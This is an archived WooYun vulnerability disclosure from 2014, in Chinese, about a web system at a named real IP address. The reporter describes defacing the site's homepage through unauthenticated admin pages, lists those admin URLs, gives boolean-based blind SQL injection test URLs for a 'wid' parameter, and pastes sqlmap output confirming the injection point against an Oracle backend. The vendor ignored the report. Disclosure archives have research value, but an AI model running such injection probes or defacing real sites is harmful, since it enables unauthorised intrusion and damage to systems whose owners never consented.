乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-20: 细节已通知厂商并且等待厂商处理中 2014-05-25: 厂商已经主动忽略漏洞,细节向公众公开
呵呵
首页貌似被我插logo插坏了........越权
http://122.224.8.3/admin/ADedit.aspxhttp://122.224.8.3/admin/knowledge.aspx
以下插入wooyun的logo做证明地址
http://122.224.8.3/Default_20080624.aspx
一处sql盲注
http://122.224.8.3/nbb/wiki.aspx?wid=3034%20and%201=1
返回正常
http://122.224.8.3/nbb/wiki.aspx?wid=3034%20and%201=2
返回错误
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 21:32:32[21:32:32] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\122.224.8.3\session' as session file[21:32:32] [INFO] resuming back-end DBMS 'oracle' from session file[21:32:32] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: wid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: wid=3034 AND 2979=2979---[21:32:33] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oracle[21:32:33] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[21:32:33] [INFO] fetching database (schema) names[21:32:33] [INFO] fetching number of databases[21:32:33] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[21:32:33] [INFO] retrieved:[21:32:37] [ERROR] unable to retrieve the number of databases[21:32:37] [INFO] falling back to current database[21:32:37] [INFO] fetching current database[21:32:37] [INFO] retrieved:[21:32:43] [CRITICAL] unable to retrieve the database names[21:32:43] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 10 times
跑不出数据库,确实存在注入点.....有点无奈....前面的漏洞求审核!
详细说明
呵呵你们懂的!!
危害等级:无影响厂商忽略
忽略时间:2014-05-25 00:21
暂无